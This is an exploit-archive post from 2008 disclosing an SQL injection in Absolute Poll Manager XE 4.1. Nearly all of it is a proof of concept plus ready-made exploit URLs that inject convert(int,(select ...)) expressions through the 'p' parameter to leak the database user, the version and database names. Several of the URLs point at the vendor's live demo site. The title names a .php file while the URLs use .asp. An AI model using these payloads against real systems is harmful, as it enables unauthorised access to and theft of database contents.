Absolute Poll Manager XE 4.1 (xlacomments.php) SQL Injection Vulnerability

2008-10-11 05:01:03

###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002
# TM : EgY Coders
#################################################################################################

### POC
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit :

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.